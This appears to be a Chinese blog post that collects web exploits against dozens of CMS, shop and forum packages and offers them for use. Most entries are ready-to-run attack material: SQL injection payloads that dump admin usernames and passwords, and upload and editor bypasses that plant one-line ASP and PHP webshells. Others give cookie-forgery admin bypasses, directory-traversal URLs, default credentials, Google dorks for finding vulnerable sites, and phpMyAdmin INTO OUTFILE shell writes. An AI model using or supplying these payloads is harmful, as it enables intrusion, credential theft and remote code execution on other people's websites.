大金分享常用的主流WEB漏洞,EXP合集

啓航企業建站系統 cookie注入漏洞通殺所有版本

直接上exploit:
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 

1,username,password,4,5,6,7,8,9,10 from admin"));
test:http://www.33ddos.com/system/xitong/shownews.asp?id=210
-----------------------------------------------------------------------------------------------------
Asprain論壇 註冊用戶 上傳圖片就可拿到webshell    ddos*** www.33ddos.com   DDOS  

Asprain是一個適合於各中小學、中專、技校、職高建設校園論壇、師生交流論壇,一些教科研部門、公司企業建設

內部論壇、IT技術愛好者建設技術交流論壇的免費論壇程序。
1.txt存放你的一句話馬 如:<%execute(request("cmd"))%>
2.gif 爲一小圖片文件,一定要小,比如qq表情圖片
3:copy /b 2.gif+1.txt 3.gif 這樣就僞造了文件頭,但是現在傳上去還不行,我接下來就用
4:copy /b 3.gif+2.gif 4.asp ok,現在文件頭和文件尾都是正常的圖片文件了
5.q.asp;.gif
google:Powered by Asprain
-----------------------------------------------------------------------------------------------------
ShopNum1全部系統存在上傳漏洞。

首先 http://www.33ddos.com/product.html 頁面查看任意產品詳細說明。
按說明 提示登錄後臺。。
在後臺功能頁面->附件管理->附件列表
可以直接上傳.aspx 後綴***
http://www.33ddos.com/upload/20110720083822500.aspx
-----------------------------------------------------------------------------------------------------
×××CMS中小企業網站管理系統 上傳漏洞

×××CMS是中企商鋪網專爲中小企業網站開發的網站管理系統。
後臺:admin/login.asp
ewebeditor 5.5 Nday
exp:
<form?action="http://www.33ddos.com/Admin/WebEditor168/asp/upload.asp?

action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?

enctype="multipart/form-data">?
<input?type=file?name=uploadfile?size=100><br><br>?
<input?type=submit?value=upload>?
</form>
ps:先上傳小馬.
inurl:member/Register.asp 您好,歡迎來到立即註冊立即登錄設爲首頁加入收藏

-----------------------------------------------------------------------------------------------------
YothCMS 遍歷目錄漏洞

優斯科技企業網站管理系統(YothCMS)是一款完全開源免費的CMS。
默認後臺:admin/login.asp
遍歷目錄:
ewebeditor/manage/upload.asp?id=1&dir=../
data:
http://www.33ddos.com/%23da%23ta%23\%23db_%23data%23%23.asa
-----------------------------------------------------------------------------------------------------
Net112企業建站系統 1.0

源碼簡介:
Net112企業建站系統,共有:新聞模塊,產品模塊,案例模塊,下載模塊,相冊模塊,招聘模塊,自定義模塊,友

情鏈接模塊 八大模塊。
添加管理員:
http://www.33ddos.com/admin/admin.asp?action=add&level=2
其實加不加都不是很重要,後臺文件都沒怎麼作驗證。
上傳路徑:
http://www.33ddos.com/inc/Upfile.as ... 0&ImgHeight=200
http://www.33ddos.com/inc/Upfile.asp?Stype=2
怎麼利用自己研究。
遍歷目錄:
http://www.33ddos.com/admin/upfile.asp?path=../..
如:
http://www.33ddos.com/admin/upfile.asp?path=../admin
http://www.33ddos.com/admin/upfile.asp?path=../data
-----------------------------------------------------------------------------------------------------
易和陽光購物商城通殺 上傳漏洞

前提要求是IIS6.0+asp壞境。
漏洞文件Iheeo_upfile.asp 
過濾不嚴.直接可以iis6.0上傳
ASP***改成0855.asp;1.gif
直接放到明小子上傳

Google搜索:inurl:product.asp?Iheeoid=

-----------------------------------------------------------------------------------------------------

傳信網絡獨立開發網站源碼0day漏洞

後臺system/login.asp
進了後臺有個ewebeditor
Google 搜索inurl:product1.asp?tyc=
編輯器漏洞默認後臺ubbcode/admin_login.asp
數據庫ubbcode/db/ewebeditor.mdb
默認賬號密碼yzm 111111

webshell方法
登陸後臺點擊“樣式管理”-選擇新增樣式 
樣式名稱:scriptkiddies 隨便寫 
路徑模式:選擇絕對路徑 
圖片類型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
圖片類型比如就是我們要上傳的ASP***格式
上傳路徑:/
圖片限制:寫上1000 免的上不了我們的asp***
上傳內容不要寫
可以提交了 
樣式增加成功! 
返回樣式管理 找到剛纔添加的樣式名稱 然後按工具欄 在按新增工具欄 
按鈕設置 在可選按鈕 選擇插入圖片然後按》 -然後保存設置
網頁地址欄直接輸入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
ASP*** 回車 等到路徑

後臺:system/login.asp
Exp:
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
測試:
http://www.33ddos.com/product_show.asp?id=9 and 1=2 union select 

1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
http://www.33ddos.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 

from master
-----------------------------------------------------------------------------------------------------
foosun 0day 最新注入漏洞

漏洞文件:www.33ddos.com/user/SetNextOptions.asp
利用簡單的方法:
暴管理員帳號:
http://www.33ddos.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
暴管理員密碼:
http://www.33ddos.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
-----------------------------------------------------------------------------------------------------
網站程序的版權未知!

默認網站數據庫:
www.33ddos.com/data/nxnews.mdb
ewebeditor 在線編輯器:
編輯器數據庫下載地址:www.33ddos.com/ewebeditor/db/ewebeditor.mdb
登錄地址:ewebeditor/admin_login.asp
默認密碼:admin  admin
登陸後可遍歷目錄:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data

Sql注入漏洞:
http://www.33ddos.com/detail.asp?id=12
exp:
union select 1,admin,password,4,5,6,7,8 from admin
爆出明文帳號/密碼

上傳漏洞:
後臺+upfile.asp
如:
http://www.33ddos.com/manage/upfile.asp 可以用工具。如明小子。
shell的地址:網址+後臺+成功上傳的馬
google:inurl:news.asp?lanmuName=
-----------------------------------------------------------------------------------------------------
dedecms最新0day利用不進後臺直接拿WEBSHELL

webshell的方法如下:
網傳的都是說要知道後臺才能利用,但不用,只要 plus 目錄存在,服務器能外連,就能拿shell.
前題條件,必須準備好自己的dede數據庫,然後插入數據:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, 

\'\');echo "OK";@fclose($fp);{/dede:php}'); 

再用下面表單提交,shell 就在同目錄下 1.php。原理自己研究。。。
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" 

style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
-----------------------------------------------------------------------------------------------------
dedecms織夢暴最新嚴重0day漏洞
bug被利用步驟如下:
http://www.33ddos.com/網站後臺/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST

[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]

=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面{}上的字母改爲當前的驗證碼,即可直接進入網站後臺。
-----------------------------------------------------------------------------------------------------
多多淘寶客程序上傳漏洞 
漏洞頁面:
admin\upload_pic.php
傳送門:
http://www.33ddos.com/admin/upload_pic.php?uploadtext=slide1
PS:copy張圖片馬 直接  xxx.php 上傳抓包地址!
-----------------------------------------------------------------------------------------------------
無憂公司系統ASP專業版後臺上傳漏洞
漏洞文件 後臺上傳
admin/uploadPic.asp
漏洞利用 這個漏洞好像是雷池的
http://www.33ddos.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
等到的webshell路徑:
/UploadFiles/scriptkiddies.asp;_2.gif
-----------------------------------------------------------------------------------------------------
住哪酒店分銷聯盟系統2010
Search:
inurl:index.php?m=hotelinfo
http://www.33ddos.com/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat

(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
默認後臺:index.php?m=admin/login
-----------------------------------------------------------------------------------------------------
inurl:info_Print.asp?ArticleID=
後臺 ad_login.asp
爆管理員密碼:
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 

from admin
-----------------------------------------------------------------------------------------------------
搜索框漏洞!
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
-----------------------------------------------------------------------------------------------------
關鍵字:
inurl:/reg_TemletSel.asp?step=2
或者
電子商務自助建站--您理想的助手
-----------------------------------------------------------------------------------------------------
iGiveTest 2.1.0注入漏洞
Version: <= 2.1.0
# Homepage: http://iGiveTest.com/
谷歌關鍵字: “Powered by iGiveTest”
隨便註冊一個帳號。然後暴管理員帳號和密碼
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat

(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
-----------------------------------------------------------------------------------------------------
CKXP網上書店注入漏洞
工具加表:shop_admin 加字段:admin
後臺:admin/login.asp 
登陸後訪問:admin/editfile.asp?act= 直接寫馬.也可以直接傳馬:admin/upfile1.asp?path=/
inurl:book.asp 請使用域名訪問本站並不代表我們贊同或者支持讀者的觀點。我們的立場僅限於傳播更多讀者感興

趣的信息
-----------------------------------------------------------------------------------------------------
段富超個人網站系統留言本寫馬漏洞
源碼下載:http://www.mycodes.net/24/2149.htm
addgbook.asp 提交一句話。
連接: http://www.xxxx.tv/date/date3f.asp
google:爲防批量,特略!
-----------------------------------------------------------------------------------------------------
智有道專業旅遊系統v1.0 注入及列目錄漏洞
默認後臺路徑:/admin/login.asp
默認管理員:admin
默認密碼:123456
SQL EXP Tset:
http://www.33ddos.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 
from admin
-----------------------------------------------------------------------------------------------------
ewebeditor(PHP) Ver 3.8 本任意文件上傳0day
EXP:
<title>eWebeditoR3.8 for php任意文件上EXP</title>
<form action="" method=post enctype="multip
art/form-data"> 
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 
URL:<input type=text name=url value="http://www.33ddos.com/ewebeditor/" size=100><br> 
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||

php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|

bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||

0|||500|||300|||0|||...|||FF0000|||12|||宋體||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> 
file:<input type=file name="uploadfile"><br> 
<input type=button value=submit onclick=fsubmit()> 
</form><br> 
<script> 
function fsubmit(){ 
form = document.forms[0]; 
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; 
alert(form.action); 
form.submit(); 

</script>
注意修改裏面ewebeditor的名稱還有路徑。
-----------------------------------------------------------------------------------------------------
提交’時提示ip被記錄 防注入系統的利用
網址:http://www.xxx.com/newslist.asp?id=122′
提示“你的操作已被記錄!”等信息。
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute

(request("TNT"))寫入一句話。
-----------------------------------------------------------------------------------------------------
西部商務網站管理系統 批量拿shell-0day
這站用的是SQL通用防注入程序 V3.0,恩,這東西可不好繞,我記得當初我有寫過一個文章 通過提交一句話直接拿

shell的..唯一的前提是存儲記錄ip的數據庫必須是.asp或.asa才行..看了下sqlin.mdb 
1:admin_upset.asp 這個文件有個設置上傳後綴的地方.. 很簡單,它直接禁止了asp,asa.aspx 還有個cer可以利用


2:同樣是admin_upset.asp 這個文件不是入庫的 他是直接在htmleditor目錄生成個config.asp文件...Ok不用多說,

插個一句話搞定...注意閉合
3:admin_bakup.asp 備份數據庫的..但是得本地構造...調用了filesystemobject 怎麼利用就不強調了..IIS的bug

大家都懂
-----------------------------------------------------------------------------------------------------
JspRun!6.0 論壇管理後臺注入漏洞

SEBUG-ID:20787 發佈時間:2011-04-30 影響版本:
JspRun!6.0 
漏洞描述:
JspRun!論壇管理後臺的export變量沒有過濾,直接進入查詢語句,導致進行後臺,可以操作數據庫,獲取系統權限


在處理後臺提交的文件中ForumManageAction.java第1940行
String export = request.getParameter("export");//直接獲取,沒有安全過濾
if(export!=null){
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, 

t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid 

WHERE styleid='"+export+"'");//進入查詢語,執行了...
if(styles==null||styles.size()==0){
<*參考
[email][email protected][/email]
*> SEBUG安全建議:

1)安全過濾變量export
2)在查詢語句中使用佔位符
-----------------------------------------------------------------------------------------------------
烏邦圖企業網站系統 cookies 注入

程序完整登陸後臺:/admin/login.asp
默認登陸帳號:admin 密碼:admin888
語句:(前面加個空格)
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
或者是16個字段:
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
爆不出來自己猜字段。
注入點:http://www.33ddos.com/shownews.asp?=88
getshell:後臺有備份,上傳圖片小馬。備份名:a.asp 訪問 xxx.com/databakup/a.asp
關鍵字:
inurl:shownews?asp.id=
-----------------------------------------------------------------------------------------------------
CKXP網上書店注入漏洞

工具加表:shop_admin 加字段:admin
後臺:admin/login.asp 
登陸後訪問:admin/editfile.asp?act= 直接寫馬.也可以直接傳馬:admin/upfile1.asp?path=/
inurl:book.asp 請使用域名訪問本站並不代表我們贊同或者支持讀者的觀點。我們的立場僅限於傳播更多讀者感興

趣的信息
-----------------------------------------------------------------------------------------------------
YxShop易想購物商城4.7.1版本任意文件上傳漏洞

http://www.33ddos.com/controls/fckedit ... aspx/connector.aspx
跳轉到網站根目錄上傳任意文件。
如果connector.aspx文件被刪可用以下exp,copy以下代碼另存爲html,上傳任意文件
<form id="frmUpload" enctype="multipart/form-data" 

action="http://www.33ddos.com/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?

Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
-----------------------------------------------------------------------------------------------------
SDcms 後臺拿webshell

第一種方法:
進入後臺-->系統管理-->系統設置-->系統設置->網站名稱;
把網站名稱內容修改爲   "%><%eval request("xxx")'    //密碼爲xxx
用菜刀鏈接http://www.xxx.com/inc/const.asp  就搞定了。
第二種方法:
進入後臺-->系統管理-->系統設置-->系統設置->上傳設置;
在文件類型裏面添加一個aaspsp的文件類型,然後找一個上傳的地方直接上傳asp文件! 注:修改文件類型後不能

重複點保存!
第三種方法:
進入後臺-->界面管理-->模板文件管理-->創建文件
文件名寫入getshell.ashx
內容寫入下面內容:
/====================複製下面的=========================/
<%@ WebHandler Language="C#" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void Proce***equest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
/=============================================/
訪問這個地址:http://www.xxx.com/skins/2009/getshell.ashx
會在http://www.xxx.com/skins/2009/目錄下生成getshell.asp 一句話*** 密碼爲xxx 用菜刀鏈接
-----------------------------------------------------------------------------------------------------
ESCMS網站管理系統0day

後臺登陸驗證是通過admin/check.asp實現的

首先我們打開http://www.33ddos.com/admin/es_index.html
然後在COOKIE結尾加上
; ESCMS$_SP2=ES_admin=st0p;
修改,然後刷新
進後臺了嘎..
然後呢…提權,嘿嘿,admin/up2.asp,上傳目錄參數filepath過濾不嚴,導致可截斷目錄,生成SHELL

利用方法,可以抓包,然後改一下,NC上傳,還可以直接用DOMAIN等工具提交.
嘿嘿,成功了,shell地址爲http://www.33ddos.com/admin/diy.asp
存在這個上傳問題的還有admin/downup.asp,不過好像作者的疏忽,沒有引用inc/ESCMS_Config.asp,導致打開此頁面

失敗..
在版本ESCMS V1.0 正式版中,同樣存在上傳問題admin/up2.asp和admin/downup.asp都可利用,只不過cookies欺騙不

能用了
-----------------------------------------------------------------------------------------------------
寧志網站管理系統後臺無驗證漏洞及修復

網上搜了一下,好像沒有發佈.如有雷同純粹巧合!
官方網站:www.ningzhi.net
學校網站管理系統 V.2011版本 
http://down.chinaz.com/soft/29943.htm 
其它版本(如:政府版等),自行下載.
漏洞說明:後臺所有文件竟然都沒有作訪問驗證...相當無語...竟然用的人還很多.汗~~~
login.asp代碼如下:
<%  response.Write"<script language=javascript>alert('登陸成功!請謹慎操作!謝

謝!');this.location.href='manage.asp';</script>" %> 
manage.asp代碼我就不帖出來了.反正也沒驗證.
只要訪問登陸頁就可以成功登陸.....蛋疼~~~ 對此本人表示不理解!
漏洞利用:
直接訪問http://www.33ddos.com/admin/manage.asp
數據庫操作:http://www.33ddos.com/admin/manage_web.asp?txt=5&id=web5
-----------------------------------------------------------------------------------------------------
phpmyadmin拿shell的四種方法總結及修復

方法一:
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同時執行,在數據庫: mysql 下創建一個表名爲:study,字段爲7on,導出到E:/wamp/www/7.php
    一句話連接密碼:7on
方法二:
讀取文件內容:    select load_file('E:/xamp/www/s.php');
寫一句話:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
cmd執行權限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO 

OUTFILE 'E:/xamp/www/study.php'
方法三:
JhackJ版本 PHPmyadmin拿shell
Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
select cmd from study into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS study;
<?php eval($_POST[cmd])?>
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查詢結果爲空(即零行)。
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影響列數: 1
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影響列數: 1
DROP TABLE IF EXISTS study;# MySQL 返回的查詢結果爲空(即零行)。
方法四:
select load_file('E:/xamp/www/study.php');
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 

'E:/xamp/www/study.php'
然後訪問網站目錄:www.33ddos.com/study.php?cmd=dir
-----------------------------------------------------------------------------------------------------
NO.001中學網站管理系統 Build 110628 注入漏洞

NO.001中學網站管理系統功能模塊:
1.管理員資料:網站的基本信息設置(校長郵箱等),數據庫備份,用戶管理、部門及權限管理等
2.學校簡介:一級分類,可以添加校園簡介,領導致辭、校園風光、聯繫我們。。。等信息
3.文章管理:二級分類,動態添加各相關頻道(圖片視頻頻道、學校概況頻道除外)文章等信息
4.視頻圖片管理:一級分類,動態添加視頻或者圖片等信息
5.留言管理:對留言,修改,刪除、回覆等管理
6.校友頻道:包括校友資料excel導出、管理等功能
7.友情鏈接管理:二級分類,能建立不同種類的友情鏈接顯示在首頁
默認後臺:admin/login.asp
官方演示:http://demo.001cms.net
源碼下載地址:http://down.chinaz.com/soft/30187.htm
EXP:
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
測試:http://demo.001cms.net/shownews.asp?type=新聞動態&stype=校務公開&id=484 union select 

1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
getshell:後臺有備份,你懂的
:FCK編輯器有幾處可利用.大家自己行挖掘,由於相關內容較多,我在這裏就不說了。

 


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章